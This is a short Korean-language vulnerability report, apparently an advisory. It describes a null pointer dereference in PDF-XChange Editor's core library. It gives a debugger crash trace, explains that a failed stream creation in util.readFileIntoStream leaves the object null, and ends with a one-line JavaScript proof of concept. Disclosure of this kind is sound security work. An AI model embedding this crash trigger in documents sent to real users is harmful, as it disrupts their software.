취약점이 발생하는 명령은 다음과 같습니다.
(5e78.60c8): Access violation - code c0000005 (!!! second chance !!!)
PDFXEditCore_x64!PXV_GetInstance+0x7252e1:
00007fff`bfb855e1 488b08 mov rcx,qword ptr [rax] ds:00000000`00000000=????????????????
이 취약점은 util.readFileIntoStream 호출 시 파일 스트림 객체 생성에 실패할 경우, 해당 객체가 정상적으로 초기화되지 않아서 0인 상태로 유지됩니다. 이때 이 객체를 그대로 사용하면서 null pointer dereference가 발생합니다.
POC는 다음과 같습니다.
util.readFileIntoStream([], 65535)
